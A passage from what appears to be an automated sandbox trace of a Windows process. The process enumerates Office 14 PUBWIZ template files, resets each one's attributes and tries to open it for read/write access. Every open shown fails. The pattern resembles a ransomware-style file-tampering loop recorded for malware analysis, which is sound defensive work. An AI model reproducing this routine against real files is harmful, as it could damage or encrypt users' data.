office\\office14\\pubwiz\\dgwebsbr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.728] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.728] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIP.DPV", dwFileAttributes=0x80) returned 0 [0137.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIP.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzip.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.729] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.729] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML", dwFileAttributes=0x80) returned 0 [0137.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzipc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.729] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.729] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DOTS.POC", dwFileAttributes=0x80) returned 0 [0137.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DOTS.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dots.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.730] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DVDHM.POC", dwFileAttributes=0x80) returned 0 [0137.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DVDHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dvdhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.730] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.DPV", dwFileAttributes=0x80) returned 0 [0137.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.731] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML", dwFileAttributes=0x80) returned 0 [0137.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.732] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL11.POC", dwFileAttributes=0x80) returned 0 [0137.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.732] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAILMOD.POC", dwFileAttributes=0x80) returned 0 [0137.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAILMOD.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\emailmod.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.733] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV11.POC", dwFileAttributes=0x80) returned 0 [0137.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\env11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.733] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV98.POC", dwFileAttributes=0x80) returned 0 [0137.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\env98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.735] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV98SP.POC", dwFileAttributes=0x80) returned 0 [0137.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENV98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\env98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.735] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.735] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.DPV", dwFileAttributes=0x80) returned 0 [0137.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML", dwFileAttributes=0x80) returned 0 [0137.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.736] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVHM.POC", dwFileAttributes=0x80) returned 0 [0137.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.737] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FEZIP.POC", dwFileAttributes=0x80) returned 0 [0137.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FEZIP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\fezip.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.738] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLY98SP.POC", dwFileAttributes=0x80) returned 0 [0137.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLY98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\fly98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.738] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.DPV", dwFileAttributes=0x80) returned 0 [0137.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.739] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML", dwFileAttributes=0x80) returned 0 [0137.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.740] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER11.POC", dwFileAttributes=0x80) returned 0 [0137.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.740] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER98.POC", dwFileAttributes=0x80) returned 0 [0137.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.744] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYERHM.POC", dwFileAttributes=0x80) returned 0 [0137.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYERHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyerhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.745] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.DPV", dwFileAttributes=0x80) returned 0 [0137.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.745] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML", dwFileAttributes=0x80) returned 0 [0137.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.746] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.746] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC", dwFileAttributes=0x80) returned 0 [0137.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\form98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.746] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.746] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC", dwFileAttributes=0x80) returned 0 [0137.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\formctl.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.747] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.747] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.747] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.748] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FS3BOX.POC", dwFileAttributes=0x80) returned 0 [0137.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FS3BOX.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\fs3box.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.749] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.DPV", dwFileAttributes=0x80) returned 0 [0137.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.749] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.749] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML", dwFileAttributes=0x80) returned 0 [0137.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.750] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT98.POC", dwFileAttributes=0x80) returned 0 [0137.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.750] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREET11.POC", dwFileAttributes=0x80) returned 0 [0137.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREET11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greet11.poc"), dwDesiredAccess=0xc0000000, 